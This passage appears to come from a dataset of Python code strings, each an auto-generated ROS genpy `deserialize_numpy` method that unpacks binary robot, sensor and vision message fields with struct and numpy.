str[start:end]\n _x = self\n start = end\n end += 20\n (_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.pickup_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.pickup_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.dropoff_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.dropoff_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 60\n (_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, _x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, _x.goal.perception_source,) = _get_struct_7di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n _x = self\n start = end\n end += 97\n (_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r,) = _struct_B12d.unpack(str[start:end])\n self.visible = bool(self.visible)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.robot_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.robot_id.description = str[start:end].decode('utf-8')\n else:\n self.robot_id.description = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.agv_msg.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.agv_msg.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vendor = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.agv_msg.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.agv_msg.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 11\n (_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors,) = _struct_B2i2B.unpack(str[start:end])\n self.partial_view = bool(self.partial_view)\n self.use_simple_occlusion = bool(self.use_simple_occlusion)\n self.add_point_colors = bool(self.add_point_colors)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 44\n (_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag,) = _struct_2I2d4fh2B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.t_start is None:\n self.t_start = genpy.Time()\n if self.duration is None:\n self.duration = genpy.Duration()\n end = 0\n _x = self\n start = end\n end += 65\n (_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative,) = _get_struct_6d2I2iB().unpack(str[start:end])\n self.relative = bool(self.relative)\n self.t_start.canon()\n self.duration.canon()\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 24\n self.thumb = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.index = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.middle = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.ring = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.little = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 64\n (_x.max_features, _x.window_size, _x.quality, _x.min_distance, _x.harris, _x.size_block, _x.pyramid_lvl, _x.mask_border,) = _get_struct_2q3d3q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.accelerometer is None:\n self.accelerometer = None\n if self.gyro is None:\n self.gyro = None\n if self.orientation is None:\n self.orientation = None\n if self.led_color is None:\n self.led_color = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.accelerometer = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.accelerometer.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gyro = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.gyro.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.orientation = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Quaternion()\n _x = val1\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n self.orientation.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection_velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_current = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_current = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_sensor_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_housing_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.board_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.processor_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.voltage = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.led_color = []\n for i in range(0, length):\n val1 = std_msgs.msg.ColorRGBA()\n _x = val1\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n self.led_color.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.sequence_number = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.receive_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.transmit_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_receive_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_transmit_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 8\n (self.time,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qdd_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.m_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_acc_values = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_force = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_vector = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_speed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 8\n (self.digital_input_bits,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_temperatures = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 24\n (_x.controller_timer, _x.test_value, _x.robot_mode,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.joint_modes = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.sensor_FL is None:\n self.sensor_FL = sensor_msgs.msg.Range()\n if self.sensor_FR is None:\n self.sensor_FR = sensor_msgs.msg.Range()\n if self.sensor_RR is None:\n self.sensor_RR = sensor_msgs.msg.Range()\n if self.sensor_RL is None:\n self.sensor_RL = sensor_msgs.msg.Range()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.sensor_FL.header.seq, _x.sensor_FL.header.stamp.secs, _x.sensor_FL.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_FL.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_FL.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_FL.radiation_type, _x.sensor_FL.field_of_view, _x.sensor_FL.min_range, _x.sensor_FL.max_range, _x.sensor_FL.range, _x.sensor_FR.header.seq, _x.sensor_FR.header.stamp.secs, _x.sensor_FR.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_FR.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_FR.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_FR.radiation_type, _x.sensor_FR.field_of_view, _x.sensor_FR.min_range, _x.sensor_FR.max_range, _x.sensor_FR.range, _x.sensor_RR.header.seq, _x.sensor_RR.header.stamp.secs, _x.sensor_RR.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_RR.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_RR.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_RR.radiation_type, _x.sensor_RR.field_of_view, _x.sensor_RR.min_range, _x.sensor_RR.max_range, _x.sensor_RR.range, _x.sensor_RL.header.seq, _x.sensor_RL.header.stamp.secs, _x.sensor_RL.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_RL.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_RL.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 17\n (_x.sensor_RL.radiation_type, _x.sensor_RL.field_of_view, _x.sensor_RL.min_range, _x.sensor_RL.max_range, _x.sensor_RL.range,) = _get_struct_B4f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.line is None:\n self.line = None\n if self.circle is None:\n self.circle = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.line = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Line()\n _x = val1\n start = end\n end += 20\n (_x.x1, _x.y1, _x.x2, _x.y2, _x.color,) = _get_struct_4if().unpack(str[start:end])\n self.line.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.circle = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Circle()\n _x = val1\n start = end\n end += 16\n (_x.x, _x.y, _x.radius, _x.color,) = _get_struct_3if().unpack(str[start:end])\n self.circle.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (self.yaw,) = _struct_f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.objects is None:\n self.objects = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = vision_msgs.msg.ClassifiedObject()\n _v10 = val1.header\n start = end\n end += 4\n (_v10.seq,) = _struct_I.unpack(str[start:end])\n _v11 = _v10.stamp\n _x = _v11\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v10.frame_id = str[start:end].decode('utf-8')\n else:\n _v10.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object_class = str[start:end].decode('utf-8')\n else:\n val1.object_class = str[start:end]\n start = end\n end += 4\n (val1.confidence,) = _struct_f.unpack(str[start:end])\n _v12 = val1.roi\n _x = _v12\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _struct_4IB.unpack(str[start:end])\n _v12.do_rectify = bool(_v12.do_rectify)\n self.objects.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 24\n (_x.major_ax, _x.minor_ax, _x.coup_strength, _x.limit_cycle, _x.forward_velocity, _x.curvature,) = _struct_6f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.x_offset = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.y_offset = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_1 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_2 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_3 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_4 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_5 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_6 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if 